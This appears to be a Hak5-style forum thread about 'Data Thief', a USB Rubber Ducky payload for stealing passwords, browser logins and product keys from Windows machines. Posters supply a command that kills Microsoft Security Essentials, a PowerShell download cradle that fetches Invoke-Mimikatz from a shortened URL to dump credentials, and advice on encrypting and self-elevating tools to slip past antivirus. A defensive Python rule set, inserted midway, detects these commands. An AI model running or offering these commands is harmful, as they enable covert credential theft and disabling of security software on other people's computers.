[Payload] DT 2.5 (2.6 released in a few weeks) - Backup Passwords, Product Keys, Directory Listings and much more!

Hello Lavanoid,

I'm having a problem with the payload: the SP.bat version 1.6 isn't doing everything it should, like getting the pass dump and the Chrome pass and more, but SP.bat 1.5 is working fine.

I have changed the settings inside SP.bat through all the combinations possible and nothing. I'm running Win7 64-bit, and as a reminder, I run version 1.5 fine.

Thanks for the good work.

I've just uploaded another update. One of the batch labels in the SP.bat file was misspelt. My keyboard didn't enter the "_" for the 64_bit label. Should be working perfectly now. Comment if you encounter any more issues.


Thanks, and one other thing that I only checked today with the previous version: if I try to do that as an unprivileged user, Windows asks for the admin's password. Is there any way around it?

Well, without Administrative access, the only things the payload can really do are get Chrome login data and Windows product keys. The procdump won't work because it requires access to another program's RAM data - which needs admin access; Mimikatz won't work because, once again, it needs access to another program's RAM data; and wifi keys cannot be recovered because of Microsoft's encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answer to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.


  • 1 month later...

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

Edited by MB60893

Lavanoid

Hello, how are you?

What happened, or a better question, why do you no longer have the payload available?

Can I do anything to help?

I removed the payload for reasons that I currently don't want to discuss. All I'm saying is - it's a secret :rolleyes:. I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file.

I'll re-upload the payload within a week or two. You might be wondering why so long. Well - like I said, a secret :ph34r:.

Edited by Lavanoid

Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine tuning. OSX Payload next? :P

Keep it up!


HHHmmmmm. Seems like a good idea to implement Metasploit in the payload - however, I'd need support from a group of people who have different antivirus programs. Then I'd need them to write batch files that can successfully terminate the AV user interface. Then I'd need them to make notes of what service their AV programs run under - this way, once elevation has been granted (through Metasploit) - we could just kill the AV services.

If you manage to successfully get a script that can be added to the payload which has Metasploit implemented, then that would be great. I don't have much time to tinker with Metasploit so it would be great if you guys can mess around with it instead.

Great idea though :D .


Thanks. As for OSX, unfortunately - I don't have an OSX system :( otherwise I would have definitely created a payload for Mac systems too. However, I have been looking into how the Mac OS works by Googling a lot. It's a lot like Linux (Is it Linux based?). Anyway, if I ever get my hands on an Apple computer (Maybe in the next 2/3 years? - I'm not someone with much money :unsure:) I'll let you know.


Hi again Lavanoid,

You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 
You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!

Give it a go!

MB60893.

Edited by MB60893

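Both one-liners discussed so far in this thread (the in-memory Invoke-Mimikatz download cradle above and the earlier "Taskkill /f /im msseces.exe /t" suggestion) land verbatim in process-creation logs, which is what a defender keys on. The following added example is not from the thread or from Data Thief: it runs three simple rules over constructed Windows command lines, where the URL is a placeholder and the security-process set is an assumption limited to the one name the thread mentions.

```python
import re
from typing import Dict, List

# Constructed sample process-creation command lines (e.g. from Sysmon event 1 /
# Security 4688), not taken from any real host. The first two mirror the shapes
# quoted in this thread; the URL is a placeholder, the rest are benign controls.
SAMPLE_COMMAND_LINES = [
    'powershell "IEX (New-Object Net.WebClient).DownloadString('
    "'http://example.invalid/placeholder.ps1'); Invoke-Mimikatz -DumpCreds\"",
    "Taskkill /f /im msseces.exe /t",
    "taskkill /F /IM notepad.exe",
    'powershell -Command "Get-ChildItem C:\\Users"',
    'DIR "C:\\Program Files\\Antivirus" > "%USERPROFILE%\\Desktop\\DirectoryListing.txt"',
]

# Executables of security products. msseces.exe (Microsoft Security Essentials UI)
# is named in the thread; extend this set with your own product's process names.
SECURITY_PROCESSES = {"msseces.exe"}

# Pattern rules: (finding name, compiled regex). Case-insensitive because cmd.exe
# and PowerShell both ignore case in cmdlet and flag names.
RULES = [
    # Invoke-Expression over content fetched by WebClient: a download cradle.
    ("powershell_download_cradle",
     re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*\b(Net\.WebClient|DownloadString|DownloadFile)\b")),
    # In-memory credential dumping via the Invoke-Mimikatz module.
    ("in_memory_credential_dump", re.compile(r"(?i)Invoke-Mimikatz|-DumpCreds\b")),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of all rules a single command line triggers."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # taskkill is only suspicious when its /im target is a security process,
    # so this rule parses the argument instead of matching the whole string.
    if re.match(r"(?i)\s*taskkill\b", cmdline):
        target = re.search(r"(?i)/im\s+(\S+)", cmdline)
        if target and target.group(1).lower() in SECURITY_PROCESSES:
            hits.append("security_tool_termination")
    return hits


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Keep only command lines with at least one finding, with their findings."""
    results = []
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            results.append({"cmdline": cmd, "hits": hits})
    return results


if __name__ == "__main__":
    for entry in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(entry["hits"]), "<-", entry["cmdline"])
```

Running it flags only the first two sample lines; the benign taskkill of notepad.exe and the DIR listing from later in this thread pass untouched.
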
I used Mimikatz in the previous versions of Data Thief, but it does trigger Microsoft Security Essentials (Why pay for antivirus?). I bypassed this issue by storing Mimikatz in an encrypted zip archive; then, when needed, 7-Zip would decrypt the archive and run Mimikatz. The advantage of this is that since the Duck RW speeds are slow, antivirus cannot scan the Duck because it is in use by 7-Zip and Mimikatz. Some (if not all) people think it's bad that the Duck has slow RW speeds, but I think it gives us the advantage. The advantage of procdump is that it doesn't trigger AV, but it can be slow :/.

Another thing is - Mimikatz doesn't work with Windows 8.1 due to the new security enhancements. I don't have Windows 8, but I did try it on a friend's PC. I would have Windows 8 but they have an OEM key (the key you get when you buy a computer) so I can't activate it - I need a genuine Windows key :/. Anyway - back to the main subject. Mimikatz has been implemented in Data Thief already. Thanks anyway though :D.

Before I release DT (Data Thief) - I recommend installing the Duck 4CAP firmware (you can get it on Ducky Decode). I recommend it because if Windows takes its time installing the drivers (common with netbook computers), you don't have to worry about it exceeding the delay time.


  • 3 weeks later...

Really, thanks for your job, sir.

The payload works fine for me, but it's detected by my AV: Avira Free, which has been put in Real-Time mode.

Do you or anyone else know how to circumvent this problem stealthily?

Thanks again.


Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. installation path like: "C:\Program Files\Antivirus", service name: "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" and/or "AntivirusSVC.exe".

A directory listing of your antivirus program's installation path would be cool. You can do this by running cmd.exe, then using this command:

DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt"

You would obviously have to edit the directory part.

Thanks for the bug report :D

Edited by Lavanoid

There is no backup log because it stops after the indication that Windows Update has started.

The file detected is: "SCRIPT_EX.exe" as a "TR/ATRAPS.Gen".

The Antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop

The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt

Let me know if this is enough!


HHHmmm. So I guess I'd have to find a different way of executing the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self-elevating batch script. I realized that the Slax Linux installer batch file has the ability to self-elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because it's a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days.

Thanks.


Thanks a lot in advance for your effort and for taking care of my situation.


I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self-elevate, so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe.

Just download the update, extract it, remove SCRIPT_EX.exe from the duck as well as inject.bin; then run Installer.bat to copy the required files.

Hope this update works ;)


Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :(


I believe I've just fixed the problem. I'll upload the update within the next 12 hours as I currently don't have the time to do so. I've also edited the NetCat Terminal.bat file so it has more functions than the previous versions :D .

Hope this update will solve your problems ;) .


Thanks for all your great work Lavanoid!

About your question on the first page,

"I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?"

I would like to believe in the creation of a fusion of your ducky script and the Mr Grays payload's script. In my opinion, it's a great combination if it's possible!


Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs as one and then encrypt them so that when they run, AV won't know what it is.


Thank you very much for the answer! However, I found that most of the applications contained in Mr Grays' package are outdated. For example, the latest version of the PasswordFox app from Nirsoft's site has the ability to detect passwords on a machine running Windows 7 64-bit, unlike the first app in the original package. That's all, and thank you again for this wonderful work!
